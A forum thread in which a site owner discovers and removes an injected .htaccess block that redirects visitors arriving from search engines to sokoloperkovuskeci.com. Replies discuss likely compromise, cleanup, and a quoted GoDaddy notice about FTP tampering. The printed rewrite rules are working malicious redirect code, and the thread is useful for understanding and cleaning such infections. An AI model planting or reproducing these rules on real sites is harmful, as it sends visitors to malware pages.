Site is redirecting from search results to sokoloperkovuskeci.com

I found today that my site is not getting viewers fom search results

so i tried and when i clicked on a search result related to my site it redirects me to http://sokoloperkovuskeci.com/in.php?g=431

so i searched for this prob in google and found that problem is in my .htaccess

So i looked my .htaccess and found this extra code added on top of my .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=431 [R,L]
</IfModule>

Code (markup):

now i have removed it and my site is working properly

But i want to know how it is possible? How can someone change this?

and today i saw that many blogs are affected by this attack. so i think its a big attack on all over the world

My site is not a wordpress blog my site runs on a video sharing script

So do anyone of you can tell me how to stop this type of attack in future.

I have changed my admin, ftp and hosting passwords also now....

 

It might be possible that your admin details were leaked to some unauthorized party or someone has hacked your admin details. There are many such viral programs running on internet which are targeting sites and inserting such codes in their home directory and in their linked and related sites too. You should be careful in respect of those and keep changing your admin details once in a month for security purpose.

 

Going by their Alexa rank, their getting lots of traffic. http://www.alexa.com/siteinfo/sokoloperkovuskeci.com

Not sure how to fix it, but if you keep searching, you may find someone that knows what exploit/vulnerability they used, then you can search for a patch.

Good luck.

 

i searched a lot, but didnt found any trick to patch this hack...

if anyone here can do it i would be very thankful...

 

The same thing happened with me and what i learned means using free or low cost hosting are easily hackable.my forum too was redirected to another site.

 

I am using Godaddy Hosting!

 

you should submit this site as spam to google,

 

you need to submit that website as spam to Google

 

Check this website, it seems to be the answer: http://cleanbytes.net/google-search-results-poisoning-or-wordpress-vulnerability

 

ALso, you might contact your web hosting provider for server side security.

 

Hi my site is currently infected with Malicious software is hosted on 2 domain(s), including sokoloperkovuskeci.com/, smartehholder.com/. I think same as yours I just want to ask where can I find the .htaccess so I can manually delete it.

 

Hi guys, just wrote a blog post on this as it happened to one of our clients. GoDaddy is not saying much yet but there is not a lot you can do at your end. http://stewartmedia.biz/search-engine-optimisation-blog/godaddy-malware/ GoDaddy are saying you will be notified if compromised and are suggesting changing passwords.. which is a little unsettling to say the least.

 

GoDaddy finally sent this out to their customers.
"Earlier this week, our Information Security Team detected suspicious activity within your hosting account. The investigation concluded someone had changed your .htaccess file in your home directory using FTP. The attacking IP was blocked, and your original .htaccess file was restored automatically.

To safeguard your account against another unauthorized change, we have reset your FTP password.

If you use a content management system to manage your content, no further action is required.

If you do use FTP to manage your website, you will need to change your password before reconnecting. For instructions on how to change your FTP password, see our article Resetting Your Hosting Account Password (FTP Password).

If you have any questions, please call our live, 24/7 customer support at (480) 505-8877.

Sincerely,

GoDaddy.com, Inc."